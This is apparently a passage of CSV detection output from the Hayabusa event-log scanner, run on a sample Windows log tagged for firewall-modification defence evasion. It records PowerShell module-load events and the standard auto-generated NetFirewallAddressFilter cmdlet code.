Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.872 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.873 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.926 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.926 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.926 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.926 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.927 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.927 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.973 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 